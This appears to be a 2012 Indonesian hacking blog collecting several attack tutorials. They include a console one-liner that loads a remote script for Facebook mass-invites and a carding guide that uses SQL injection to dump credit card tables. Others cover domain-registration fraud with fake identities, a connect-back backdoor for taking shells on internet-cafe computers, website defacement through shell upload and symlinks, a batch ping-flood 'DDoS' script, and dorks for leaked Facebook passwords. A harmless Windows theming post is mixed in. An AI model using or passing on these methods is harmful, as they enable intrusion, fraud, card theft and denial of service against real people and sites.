Senin, 24 September 2012

Script Auto Invite Group Facebook

Posted by Unknown 05.44, under , | No comments


Script Auto Invite Group Facebook | Jogjakarta-Cyber4rt
yak,,,, bagi para facebookers yang pengen punya group dengan anggota yang beribu-ribu???? hahahahaha
Nih pakek cara ini pasti langsung deh tu group langsung banyak anggotanya..
ok langsung aja ya

1. buka browser mozilla
2. lalu login FB sobat
3. masuk ke group yang udah sobat buat 
4. lalu tekan  CTRL + SHIFT + K Pada keyboard sobat
5. lalu Copy & Paste code Ini :
document.body.appendChild(document.createElement('script')).src='http://vikrymadz.googlecode.com/files/AutoInviteGroup.js';

6. Lalu Tekan Enter ....
7. tunggu sampai prosesnya selesei....

Gimana???? bisa gak????? klo gak bisa komentar yaaahh....

Step by Step Carding

Posted by Unknown 05.43, under , | 4 comments

Step by Step Carding |  Jogjakarta-Cyber4rt
step by step carding kali ini saya membuat tutorial carding , sebenernya ini tutor buat yg cupu kayak saya, ahahahaha

-------------------------------
tools yg di siapkan yaitu:
#.google extractor
#.sql exploiter versi brp aja
-------------------------------

-------------------------------
tahap tahap yg di lakukan 1
#buka google extractor, lalu masukan dork product.asp?id= site:il (harus il, kalo .id tak sumpahin jadi babi)
#trus scan, kalo sudah muncul link" yg kluar silah kan di klick kanan trus remove duplicate, biar ga keder
[Image: 24966_1256326613100_1377657451_30626880_2741170_n.jpg]
#lalu pindah ke TAB sql injector query builder
#masukan argumen tanda tanya(?)di insert arguments here
#kalo sudah klick Build Dan Scan
[Image: 24966_1256327293117_1377657451_30626881_7835278_n.jpg]
#trus ke tab berikut nya yaitu tab attack victim
#cari yg error result nya : unclosed quotation mark before the character ..... ga tau knp pokok nya ikutin aja jgn banyak tanya :p
#klick kanan copy url yg victim
[Image: 24966_1256330213190_1377657451_30626907_5067141_n.jpg]
tahap pemakaian sql exploiter2
#buka sql exploiter trus ke tab attacker for the hackable SHIT !!
#klik add manualy , masukan url yg victim tadi, trus paste (kadang tanda ' harus di hilangkan)
[Image: 24966_1256337133363_1377657451_30626936_8328987_n.jpg]
#kalo udah klick site info sampe info nya keluar
#kalo udah keluar maka tingal get table, maka akan muncul table" web tersebut, yg ku tandai warna biru
[Image: 24966_1256339053411_1377657451_30626940_4075654_n.jpg]
#pilih salah 1 yg ada di table tsbt, yg kira" dimana letak CC nya, trus get columb buat mengetahui colum apa aja di table tsb, tapi x ini aku ga ke table order
#kalo udah muncul smua colomb , drag smua colom trus get data
[Image: 24966_1256343293517_1377657451_30626944_1577372_n.jpg]
tutor ini di tulis dengan keyboard sendiri :p
credit : palembang hacker link dan kamu yg melihat tutor ini

aku ga ngajarin kejahatan lho, cuma buat info aja, kalo di tangkep interpol jgn bawa" nm saya :p

saya cuma manusia biasa yg bertugas sebagai panitia hari kiamat

Minggu, 23 September 2012

TUTORIAL LENGKAP ,ORDER DOMAIN , DOMAIN + HOSTING & FTP ACCOUNT DI STRATO

Posted by Unknown 01.00, under , | No comments

Moga-moga berguna :)

#Ini lanjutan / penjelasan dari Thread ini
List Tutorial :


A.ORDER DOMAIN ONLY : Klik disini untuk Tutorial
B.ORDER DOMAIN + HOSTING : Klik disini untuk Tutorial
C.SETTING FTP & AKSES DI FILEZILLA : Klik disini untuk Tutorial
D.TUTORIAL UPLOAD & INSTALL WORDPRESS : Klik disini untuk Tutorial

-|| ORDER DOMAIN ||-

Ikuti step by step ,jangan ada yang ketinggalan .

1.Buka https://www.strato.nl/
Isikan domain lalu checken

Spoiler: hide
[Image: c.php?f=201111160618054_untitled_4ec2f32d7801d.jpg]
2.Pilih domain (ex: .com .net .org )

3.Cek Domain bisa registrasi atau tidak (vrij
= bisa )

4.Kalo domain bisa didaftarkan ,lalu pilih Selectie overnemen
Spoiler: hide
[Image: c.php?f=201111160157034_1_4ec2b5ff73415.jpg]

5.Pilih paket Strato Domain Nu bestellen
Spoiler: hide
[Image: c.php?f=201111160625364_untitled_4ec2f4f0de835.jpg]

6.Rokok dulu wakaka

7.Generate name di situs http://www.fakenamegenerator.com/gen-male-en-nl.php
Isi semua data ..

8.Pilih PC Plus

9.Pilih Volgende
Spoiler: hide
[Image: c.php?f=201111160212094_4_4ec2b98923d5a.jpg]

10.Pilih Betaalgegevens aanpassen
Spoiler: hide
[Image: c.php?f=201111160213184_5_4ec2b9ce1155f.jpg]

11.Masukkan rekeningnummer 8008xxx ( xxx ,mrupakan 3 digit acak ,ex : 235 ),lalu Volgende
Spoiler: hide
[Image: c.php?f=201111160214564_6_4ec2ba3082cf6.jpg]

12.Centang Ik heb de Algeme lalu plih Bestelling afsluiten
Spoiler: hide
[Image: c.php?f=201111160216274_7_4ec2ba8b75241.jpg]

13.Akan keluar pemberitahuan Order Sukses ,lalu cek email .
Spoiler: hide
[Image: c.php?f=201111160217484_8_4ec2badc1532f.jpg]

Email 1
Spoiler: hide
[Image: c.php?f=201111160219134_email1_4ec2bb31a3c6d.jpg]

Email 2 ( Email ini akan masuk setelah 1 jam email 1 masuk )
Spoiler: hide
[Image: c.php?f=201111160219454_email2_4ec2bb51d9bba.jpg]

14.Pada email ke 3 ,ada link untuk set password ,silahkan klik link tersebut & set password
Email 3 ( Email ini akan masuk setelah 1 jam email 1 masuk )
Spoiler: hide
[Image: c.php?f=201111160220134_email3_4ec2bb6d477e7.jpg]

Cheer Domain sama sudah aktif :)
Silahkan login https://www.strato.nl/apps/CustomerService
Domeinnaam of klantennummer : Adalah nomor yang terdapat pada email ke 2
Wachtwoord : Password yang di set pada langkah 14


Silahkan berkreasi sendiri mendesign web ,atau install wordpress / blogging .
NB : Folder Cgi Bin sma Cgi Data jgn dhapus

Sabtu, 22 September 2012

John Of Yogyafree Software Download

Posted by Unknown 23.54, under | No comments


Download
John Of Yogyafree adalah tool GUI untuk hash cracker John The Ripper (http://www.openwall.com/john), pemecah kode enkripsi yang sangat populer pada platform Linux, Windows, UNIX dan lain sebagainya. John Of Yogyafree memudahkan anda untuk menjalankan John The Ripper pada Windows dengan tampilan yang sederhana dan mudah dimengerti.
Pemakaian:
Di dalam file JohnOfYogyafree.zip, terdapat folder johntheripper.zip. ekstrak ke C:\. tetapi jika anda telah menginstall john the ripper. anda tidak perlu melakukan hal ini.
Ekstrak file JohnOfYogyafree.exe, comdlg32.ocx, VSFLEX3.OCX ke folder yang anda inginkan. Jalankan JohnOfYogyafree.exe
Pembenahan kesalahan tool akan dilanjutkan, silahkan bahas penggunaannya dan laporkan bug disini
Semoga berguna
john Of Yogyafree is a GUI tool for John the Ripper (http://www.openwall.com/john), which is very popular hash cracker on Linux platforms, Windows, UNIX and others. John Of Yogyafree allows you to run John the Ripper with a simple way on your Windows and easy to understand.

Tutorial meremote salah satu komputer user warnet dari rumah

Posted by Unknown 23.47, under , | No comments


Tutorial meremote salah satu komputer user warnet dari rumah | Jogjakarta-Cyber4rt

cb
Mungkin para pembaca sudah mengetahui artikel backdooring target dengan connectback yang ditulis oleh vires di X-code Magazine 11, connectback adalah program backdoor yang dibuat oleh vires, disini penulis akan mempertajam contoh penggunaannya pada komputer user warnet, karena contoh kasus ini dapat lebih mudah dimengerti oleh pembaca.
Secara umum penulis lebih sering menggunakan program ini jika target komputer adalah menggunakan sistem operasi windows dibandingkan menggunakan netcat yang tentu dengan metode yang sama, menurut penulis, netcat lebih enak jika targetnya adalah linux.
Jika anda ingin mencoba menggunakan program ini dapat dicoba untuk remote komputer user di warnet dengan tanggung jawab anda sendiri, anda dapat mendatangi suatu warnet dan melakukan download program NewCB yang disediakan di blog ini. Dalam kompresi file ConnectBack ada 3 buah file yaitu :
cb
cbSERVER : Dijalankan di komputer yang meremote
cbCLIENT : Dijalankan di komputer yang diremote
vires.neth : Diisi dengan IP Publik yang dimiliki oleh koneksi internet anda di rumah.
Pertama-tama anda edit dulu file vires.neth, isi dengan IP Publik pada koneksi internet anda di rumah, yang memiliki IP Publik contohnya Speedy, Telkomsel Flash dan sebagainya.
cb
Setelah anda edit lalu simpan, anda jalankan program cbCLIENT, setelah dijalankan tinggal anda balik ke rumah lalu anda masuk ke komputer anda lalu di jalankan cbSERVER di komputer rumah yang terkoneksi internet dengan IP Publik.
cb
Binggo, anda sekarang telah mendapatkan shell dari komputer user warnet.
Tujuan dari artikel ini lebih pada memberikan informasi di mana remote tanpa ijin dapat terjadi di mana saja yang dimana komputer yang terkoneksi internet dapat diakses oleh banyak orang, salah satu untuk menghindari adanya hal seperti ini dapat memasang program anti exe.
Download http://xcode.or.id/newCB.rar
Password : yogyafree

Hack Website

Posted by Unknown 20.24, under | No comments

Hack Website | Jogjakarta-Cyber4rt
oke langsung aja ..
Misal kta mau Hack site:www.123.com

contoh kita mau pake "tehnik SQL Injection" kemudian kita cari distus itu ko ga ada vuln SQL nya..

maka jalan ke dua yaitu kita hack tu situs dr situs yang lain DENGAN CATATAN ITU SATU SERVER.

Step one :
kita cari dl no IP dan web yg seserver dg http://www.123.com disini :

http://www.yougetsignal.com/tools/web-si...eb-server/


tukan kelihatan IP ama Berapa Web yg se server.

Step Two :
kita buka http://www.bing.com

truz ketik :
Quote:ip:174.142.61.230 id=
#Itu IP yg dr web yang kita scan di atas tadi.
#Atau kl misala mau yg dr wordpress yg Vuln ya tinggal di modif aja :
~> ip:174.142.61.230 "wordpress"

Step Three :
Tinggal cari aja Yang vuln dari results tadi di Bing.com

setelah Ketemu contoh Vuln yg SQL injection tadi maka tinggal di Exploitasi pake tekhnik SQL injection.
#untuk tutor SQL injection dah bejibn disni.

see :
Step Four :
setelah Kita Exploitasi maka kita biasanya dapet access admin nya..
truz tinggal upload shell nya..

Five Step:
kl shell nya udah di upload maka Kita Bisa loncat dr situs yg satu ke situs yang lain dg cara "Symlink" .

Jumping nya Bisa Manual ato Pake tools..
see :
Six Step :
l udah di symlink ya tinggal buka2 aja tu config smua Web nya..

see :
sorry bro belom buat tutor yang ini ngakakngakakngakak
seven step :
Reset aja Password webnya dg memasukan Username dan Pass MYSQL yg ada di Config tadi..

eight Step :
kl dah di reset ya tinggal Masuk..
Bisa di epes ato Di tumpangi Backlink Site kita Dll dah..



NB :
Bisa kuga di Root kl punya roots exploitnya.
kl udah root ga usah jumping ato Symlin lagi..

I am just Nothing :)
belajarbelajarbelajar

DDOS Menggunakan Notepad

Posted by Unknown 19.46, under | 2 comments

DDOS Menggunakan Notepad

Jogjakarta-Cyber4rt - Kali ini Saya akan mempraktekkan DDOS melalui Notepad. Langsung saja, berikut tutorialnya:

LANGKAH 1:
Copy code-code dibawah ini :

Code:

    @echo off
    mode 67,16
    title DDOS Attack
    color 0a
    cls
    echo.
    echo DDOS With Batchfile
    echo.
    set /p x=Server-Target:
    echo.
    ping %x%
    @ping.exe 127.0.0.1 -n 5 -w 1000 > nul
    goto Next
    :Next
    echo.
    echo.
    echo.
    set /p m=ip Host:
    echo.
    set /p n=Packet Size:
    echo.
    :DDOS
    color 0c
    echo Attacking Server %m%
    ping %m% -i %n% -t >nul
    goto DDOS


LANGKAH 2:
Buka application notepad dan paste code-code diatas tadi.

LANGKAH 3:
Save file anda seperti dibawah :

File Name : DDoS Attack.bat
Save As Type : All File <--- PENTING

    Quote: bisa disave dgn namafile bebas sesuka bro n sist..
    tapi ingat , File Extensi harus berformat .Bat


Cara-cara menggunakannya :
1. Double click file anda itu.
2. Akan tertera : Server-Target:
Masukkan alamat/url website anda.pastikan tidak ada http:// di depan dan / di belakang url.

    Quote:Contoh :
    Sebelum = http://www.google.com/
    Tukarkan kepada = www[.]google[.]com

    *hilangkan tanda '[]'.
    Setelah memasukkan url itu, tekan enter.


LANGKAH 4:
Selepas itu, website itu akan di-ping untuk mendapatkan ip address.Anda memerlukan IP Address itu.

Setelah selesai ping, akan keluar seperti ini :

Pinging http://www.google.com

[209.85.175.106] with 32 bytes of data:
Reply from 209.85.175.106: bytes=32 time=30ms TTL=56
Reply from 209.85.175.106: bytes=32 time=40ms TTL=55
Reply from 209.85.175.106: bytes=32 time=24ms TTL=56
Reply from 209.85.175.106: bytes=32 time=36ms TTL=56

Ping statistics for 209.85.175.106:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 24ms, Maximum = 40ms, Average = 32ms

209.85.175.106 <----- IP address bagi http://www.google.com

    Quote: cara sama kok untuk web yg lain

4. Selepas itu, akan terpapar di tool itu : ip Host:
Masukkan saja ip address yg anda dapat tadi.

Contoh :
ip Host:209.85.175.106

dan tekan enter.

5. Pada akhirnya akan keluar pula : Packet Size :
Letakkan letakkan semau anda sebagai POWER !

Contoh :
Packet Size : 10000000

Dan tekan enter.

6. Akan terpapar : Attacking Server.....

Itu bermakna tool itu sedang menjalankan tugasnya(DDoS).

Jika ingin hasil yang maksimal , harus DDOS dengan beberapa komputer biar cepat down targetnya.

Sekian tutorial ini, agar bisa menjadi bahan pembelajaran bagi para Admin Server untuk selalu meningkatkan keamanan servernya. Salah satunya bisa menggunakan DDOS Protection, dll.


Sekian postingan saya kali ini tentang DDOS Menggunakan Notepad . Kurang lebihnya saya mohon maaf dan semoga dapat bermanfaat, Wassalam.

SEMOGA BERMANFAAT DAN DITUNGGU KOMENTAR NYA YA ^_^

Trik Modifikasi Windows XP Style Mirip Mac OS X Buatan Apple

Posted by Unknown 19.38, under , | No comments


Trik Modifikasi Windows XP Style Mirip Mac OS X Buatan Apple ImageSebelumnya kami pernah membahas bagaimana merubah tampilan Windows XP menjadi seperti Windows 7, sekarang kami akan mengajak pembaca untuk lebih banyak bereksperimen lagi dengan membuat tampilan Windows XP mirip dengan Mac OS X Tiger.
Tips ini merupakan alternatif bagi anda yang ingin punya desktop PC atau notebook buatan Apple tetapi tidak punya dana lebih untuk memilikinya mengingat hingga saat ini harganya masih lebih mahal jika dibandingkan dengan desktop PC atau notebook yang memakai Intel atau AMD sebagai processornya.
Setelah mengaplikasikan trik ini di perangkat komputer yang ansda pakai, jangan berharap aplikasi yang biasa berjalan di platform Mac OS X dapat dijalankan di windows karena tips ini hanya merubah tampilan luarnya saja, bukan merubah system yang ada di dalamnya.
Ada dua cara yang dapat dilakukan untuk merubah tampilan Windows XP seperti layaknya Mac OS X Tiger yaitu :

1) Merubah Keseluruhan Windows XP Style seperti Mac OS

Sebelum anda menggunakan cara pertama, pastikan komputer atau notebook anda memiliki spesifikasi minimal berikut :
  • Intel Pentium 2.4 GHz
  • RAM 1 GB
  • VGA RAM 64 MB
  • Windows XP Professional with Service Pack 2
  • Free space hard disk 250 MB
Jika desktop PC atau notebook memiliki spesifikasi dibawah itu, coba anda gunakan cara kedua karena lebih ringan dan tidak terlalu membebani system. Memang benar, cara pertama masih bisa digunakan meskipun kondisi PC atau notebook di bawah spesifikasi yang kami sebutkan. Tetapi jangan salahkan kami kalau system anda berjalan lambat mengingat resource system lebih banyak terpakai oleh theme dari aplikasi Mac OS X Tiger.
Kembali ke topik utama, berikut kami tunjukkan bagaimana merubah tampilan keseluruhan Windows XP agar terlihat seperti  Mac OS X Tiger :
  • Download aplikasi FlyakiteOSX. Versi terakhir yang kami gunakan adalah versi 3.5 dengan ukuran file sekitar 30.2 MB. Link download ada di bagian akhir artikel.
  • Install file yang telah anda download tadi di desktop PC atau notebook anda dan ikuti instruksinya.
  • Point paling penting adalah saat memilih komponen dan aplikasi tambahan apa saja yang ingin anda install. Anda bisa memilih beberapa aplikasi tambahan dari menu instalasi sesuai dengan keinginan anda. Pada contoh ini kami memilih semua komponen dan aplikasi tambahan diinstall pada perangkat komputer yang kami gunakan.
    Trik Modifikasi Windows XP Style Mirip Mac OS X Buatan Apple Image
  • Setelah itu, pada Extra Options pilih sesuai dengan monitor yang anda pakai. Jika menggunakan widescreen pilih opsi widescreen dan pilih opsi lainnya sesuai dengan keinginan anda.
    Trik Modifikasi Windows XP Style Mirip Mac OS X Buatan Apple Image
  • Setelah semua selesai, restart Windows XP anda.
Selesai sudah, Windows XP yang anda pakai sudah terlihat seperti Mac OS X Tiger.
Trik Modifikasi Windows XP Style Mirip Mac OS X Buatan Apple Image
Anda bisa mengatur beberapa tampilan dengan membuka bagian setting dari aplikasi ini.
Trik Modifikasi Windows XP Style Mirip Mac OS X Buatan Apple Image
Catatan Penting : Meskipun kami tidak menemui kendala sama sekali ketika menggunakan trik ini, pada beberapa forum yang kami kunjungi, beberapa versi windows mengalami sedikit masalah dengan Windows setelah menginstall FlyakiteOSX. Harap backup data penting anda yang ada di drive C sebelum menginstall FlyakiteOSX.

2) Merubah Setengah Windows XP Style seperti Mac OS

Cara yang kedua tidak akan terlalu memakan resource processor dan memory, tetapi hasilnya tidak akan sebagus cara pertama. Langkah kerjanya adalah sebagai berikut :
  • Download aplikasi Uxtheme Multi-patcher (Saat melakukan test, kami menggunakan Uxtheme Multi-patcher versi 7.1 dengan ukuran kurang dari 400 kb). Link Download ada di bagian akhir artikel.
  • Install aplikasi yang barusan anda download di perangkat yang anda pakai dan ikuti instruksinya sampai akhir. Kalau perlu restart komputer / notebook anda.
    Trik Modifikasi Windows XP Style Mirip Mac OS X Buatan Apple Image
  • Lanjutkan dengan men-download Mac OS X theme. Link Download ada di bagian akhir artikel.
  • Ekstrak file hasil download dan copy ke folder C:\Windows\Resources\Themes
  • Buka folder SS yang baru saja anda copy di C:\Windows\Resources\Themes\SS
    Trik Modifikasi Windows XP Style Mirip Mac OS X Buatan Apple Image
  • Klik dua kali file SS.msstyles dan jadikan SS sebagai default dari Windows and buttons. Anda juga melakukannya dengan klik kanan pada layar monitor, klik Properties, pilih Appearance dan pilih SS sebagai default theme.
  • Klik tombol OK atau Apply.
Sekarang, Windows XP anda sudah terlihat seperti Mac OS. Untuk menyempurnakannya, anda bisa menambahkan RK Launcher pada Windows yang anda pakai. Ikuti petunjuk berikut ini :
  • Download RK Launcher 04 Beta dan ekstrak file tersebut. Link Download ada di bagian akhir artikel.
  • Ekstrak file hasil download tadi.
    Trik Modifikasi Windows XP Style Mirip Mac OS X Buatan Apple Image
  • Jalankan file RKLauncher.exe
    Trik Modifikasi Windows XP Style Mirip Mac OS X Buatan Apple Image
Selesai dan lihat hasilnya, sebuah style yang mirip Mac OS X sudah tersedia di bagian bawah dari layar PC atau Notebook yang anda gunakan.
Kesimpulan
Kedua cara diatas memiliki kelebihan dan kekurangan tersendiri dalam mengubah tampilan Windows XP anda menjadi seperti Mac OS Tiger. Pilihlah sesuai kebutuhan dan hardware yang anda miliki. Jika anda seorang yang suka berkeksperimen dengan Windows, tidak ada salahnya untuk mencoba keduanya.
Link Download
Selamat mencoba dan jadikan Windows XP anda terasa seperti Apple. Semoga berhasil.

Dork Email & Password Facebook

Posted by Unknown 18.06, under , | 2 comments

Dork Email & Password Facebook | Jogjakarta-Cyber4rt Selamat Pagi. hari ini aku pengen ngasih dork buat tau email & password facebook. ini dork nya :

intext:charset_test=€,´,�,�,?,?,?
dan
filetype:txt intext:charset_test=

kalian juga bisa tukar dork itu mnjadi lbih kreatif agar lebih mudah buat dpt email & pswrdnya.
[butuh kesabaran dan ketelitian]

Cara Deface Website Dengan Menggunakan Tools SQLi Helper 2.7

Posted by Unknown 07.01, under | No comments

Jogjakarta-Cyber4rt - Ada tutorial hacking website lagi nihlumayan SQL Injection. kalo belum tau cara manualnya baca ini dulu Cara Hacking Website Dengan Teknik SQL Injection :D

Cara Deface Website Dengan Menggunakan Tools SQLi Helper 2.7
Yang pertama dan wajib ada yaitu Toolsnya:

Langkah kedua adalah mencari website yang vulnerabillity ( terdapat celah keamanan ), Lah carinya dimana? gampang sob, cari aja di Google :D ada banyak disana. Akh males nyarinya, yaudah nih aku kasih dorknya aja biar lebih mudah. Caranya? caranya masukan dork dibawah ini ke mesin pencarian Google, nanti muncul seribu satu macam website yang sama, nah tinggal kamu pilih satu-satu, cari yang vuln ( terdapat celah keamanan ), OK.

Google Dork SQL Injection

  • inurl:index.php?id=
  • inurl:trainers.php?id=
  • inurl:buy.php?category= 
  • inurl:article.php?ID= 
  • inurl:play_old.php?id= 
  • inurl:games.php?id= 
Maka akan muncul seribu satu macam website yang url-nya mirip seperti yang saya contohkan diatas. Sebenarnya masih banyak script atau dork SQL yang bisa kita dapatkan di internet. Nanti di artikel berikutnya, saya akan coba memberikannya secara lengkap untuk sobat.

Langkah ketiga, Sebelum memulai attacking kita harus menemukan website yang bisa dihack ( vulnerabillity ). Dari ribuan website dari dork yang saya berikan diatas, belum tentu salah satunya yang bisa dihack. Untuk mengetahuinya kita harus memberi tanda petik di akhir alamat website.
Contohhttp://www.wheelieboymotorsports.com/product_detail.php?pid=316 menjadi http://www.wheelieboymotorsports.com/product_detail.php?pid=316'Jika terdapat tulisan

  • Query failed.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'1 ORDER BY lastname' at line 1 SELECT * FROM person_old WHERE id=\'1 ORDER BY lastname. Atau Sebagainya yang mirip.
Berarti Website tersebut bisa dihack ( vuln )
Copy Url yang sobat dapatkan tadi ke kolom target.
Contoh: http://www.wheelieboymotorsports.com/product_detail.php?pid=316. ( tidak pakai tanda petik )


Kemudian klik Inject. Maka secara otomatis tools akan memeriksa ulang apakah url tersebut vuln atau tidak, versi database, supports union, dll. Jika Inject berhasil akan muncul tampilan seperti ini.


Kalau sudah klik Get Database.
*Di contoh muncul 2 Database name. Information schema dan natural. Pilih database selain Information schema. Seperti contoh dibawah, saya memilih database natural. Selanjutnya klik Get Tables.


Akan muncul beberapa list Tables yang ada. Sekarang tugas kita tinggal mencari tabel yang berisikan username dan password administratornya. Biasanya nama tabelnya tidak jauh-jauh dari admin_user, admin_login, atau apapun yang berbau informasi login admin.


Langkah Keempat, Kolom SQL
Jika sudah pilih User kalian klik get Coloumns.
Di Coloumns block yang usr_login dan usr_pass atau user_name dan password_admin lalu klik Dump Now.


Setelah itu akan muncul tampilan seperti ini


Pilih salah satu dari user login dan user password tersebut.
Ada yang aneh? Password yang ditampilkan bentuknya kok seperti ini ya?

  • 987d29241cc4f2a7465f2d9356ab3615
  • 987d29241cc4f2a7465f2d9356ab3615
Langkah Kelima, MD5 Password
Password tersebut dienkripsi dengan menggunakan metode MD5. Jadi kita harus menterjemahkan kode tersebut menjadi password yang sebenarnya. Nah, bagaimana caranya?

Caranya cukup mudah, buka saja situs MD5 Crack, lalu masukkan kode tersebut dikotak penelusuran. Berdo'a saja password yang sobat dapatkan tersebut cukup lemah, sehingga bisa dipecahkan dengan metode Bruto Force. Setelah sobat masukkan, lalu klik Crack hash baby.

Selesai. sekarang cari halaman login atau adminnya.
Ada beberapa halaman login yang bisa sobat pakai ( coba satu-satu )

  • http://target.com/admin1.php/
  • http://target.com/admin1.html
  • http://target.com/admin2.php
  • http://target.com/admin.php
  • http://target.com/controlpanel/
NOTE - Bagi yang PC nya kedetect virus atau takut PC nya kena virus, bisa pake sandboxie biar lebih aman Click Here

Sekian postingan saya kali ini tentang Cara Deface Website Dengan Menggunakan Tools SQLi Helper 2.7 , mungkin bagi yang belum tau teknik SQLi Injection cara diatas masih sangat sulit untuk dipahami, tapi saya yakin dengan latihan dan ketekunan pasti akan sobat akan paham.